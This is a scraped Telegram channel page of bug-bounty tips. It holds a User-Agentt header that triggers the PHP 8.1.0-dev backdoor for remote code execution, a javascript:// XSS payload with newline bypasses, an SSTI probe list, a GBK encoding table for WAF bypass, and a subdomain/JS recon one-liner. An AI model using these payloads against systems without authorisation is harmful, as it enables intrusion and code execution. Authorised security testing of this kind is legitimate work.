Bug bounty Tips
Open in Telegram
ð¡ïž Cybersecurity enthusiast | ð» Helping secure the digital world | ð Web App Tester | ðµïžââïž OSINT Specialist Admin: @laazy_hack3r
Show more5 860
Subscribers
+624 hours
+707 days
+36030 days
Posts Archive
5 860
From 0 to 726 views per week. starting is a best and beautiful option u do and thanks to u guys also
5 860
u guys can join and explain me here https://t.me/bug_hunting_talks, we can talk i need your suggestions its an humble request
5 860
Guys, i want your response, planning to start a bugbounty live classes training. for 2 months and 2 months internships for 20k is it going to work or not.
5 860
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli
5 860
Bug Bounty Tip
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
ð¹%0a
ð¹%0d
ð¹%E2%80%A8
ð¹%E2%80%A9
â
javascript://test.com%0aalert(1)
5 860
Bug Bounty Tip
SSTI (Server Side Template Injection) Payload List
ð¹{7*7}
ð¹*{7*7}
ð¹{{7*7}}
ð¹[[7*7]]
ð¹${7*7}
ð¹@(7*7)
ð¹
ð¹<%= 7*7 %>
ð¹${= 7*7}
ð¹{{= 7*7}}
ð¹${{7*7}}
ð¹#{7*7}
ð¹[=7*7]
If evaluated as 49 - the target is vulnerable
Cheers!
5 860
"ð€ Scan this QR code if you want to know what's cookin' at CipherOps! ð³ðµïžââïž Unravel the mysteries of cyberworld at cipherops.tech. It's like a secret menu for techies! ðð #CipherOps #TechMystery #QRAdventure"
5 860
Do you think web developers should prioritize security against XSS vulnerabilities in their projects?
5 860
Bug Bounty Tip
GBK Encoding / MultiByte Attack
å = %E5%98%8A = \u560a â %0A
å = %E5%98%8D = \u560d â %0D
åŸ = %E5%98%BE = \u563e â %3E (>)
åŒ = %E5%98%BC = \u563c â %3C (<)
å¢ = %E5%98%A2 = \u5622 â %22 (')
å§ = %E5%98%A7 = \u5627 â %27 (")
For XSS, CRLF, WAF bypass
5 860
I am looking for a contributors any one intrested can contribute on github [https://github.com/Adwaithsheety/Cipherops]
5 860
To extract JavaScript files using a one-liner with the following tools: haktrails, httpx, getjs, anew, and tojson, you can use the following command:
haktrails -d example.com | httpx -silent | getjs -c 200 - | anew -q jsfiles.txt | tojson Here's what this one-liner does step by step:
haktrails -d example.com: Uses haktrails to discover subdomains of example.com.
httpx -silent: Uses httpx to fetch the live subdomains and websites associated with example.com.
getjs -c 200 -: Uses getjs to extract JavaScript files from the discovered websites. The -c 200 flag specifies a concurrency level of 200 for faster scanning, and the hyphen (-) reads input from the previous command.
anew -q jsfiles.txt: Uses anew to filter out duplicate JavaScript file URLs and stores them in a file called jsfiles.txt.
tojson: Converts the list of JavaScript URLs into JSON format.
Available now! Telegram Research 2025 â the year's key insights 
